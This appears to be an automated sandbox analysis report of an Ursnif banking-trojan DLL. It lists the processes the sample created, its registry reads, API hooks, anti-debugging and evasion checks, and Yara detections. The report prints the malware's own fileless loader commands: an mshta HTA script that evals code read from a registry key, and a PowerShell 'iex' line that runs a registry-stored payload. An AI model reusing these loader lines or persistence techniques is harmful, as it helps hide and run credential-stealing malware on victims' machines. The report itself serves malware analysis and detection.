Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 3a94.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress, 0_2_6DD41F7C
PE file contains an invalid checksum
Source: 3a94.dll Static PE information: real checksum: 0xa34b8 should be: 0xa177e
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42253 push ecx; ret 0_2_6DD42263
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42200 push ecx; ret 0_2_6DD42209
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC7583 push ecx; ret 0_2_6DDC7596
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04617A60 push ecx; ret 3_2_04617A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04617DCF push ecx; ret 3_2_04617DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04817A60 push ecx; ret 4_2_04817A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04817DCF push ecx; ret 4_2_04817DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04197A60 push ecx; ret 5_2_04197A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04197DCF push ecx; ret 5_2_04197DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F7DCF push ecx; ret 6_2_052F7DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F7A60 push ecx; ret 6_2_052F7A69

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2786
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DD8E78D
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress, 0_2_6DD41F7C
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA2120 mov eax, dword ptr fs:[00000030h] 0_2_6DDA2120
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDB227F mov eax, dword ptr fs:[00000030h] 0_2_6DDB227F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDCE801 mov eax, dword ptr fs:[00000030h] 0_2_6DDCE801
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDCE337 push dword ptr fs:[00000030h] 0_2_6DDCE337
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDCE730 mov eax, dword ptr fs:[00000030h] 0_2_6DDCE730
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8DFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6DD8DFF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DD8E78D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DDA18EF

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8EBB6 cpuid 0_2_6DD8EBB6
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6DD41E8A
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6DD41144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04614454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_04614454
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDB1C7E _free,GetTimeZoneInformation,_free, 0_2_6DDB1C7E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6DD41F10
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
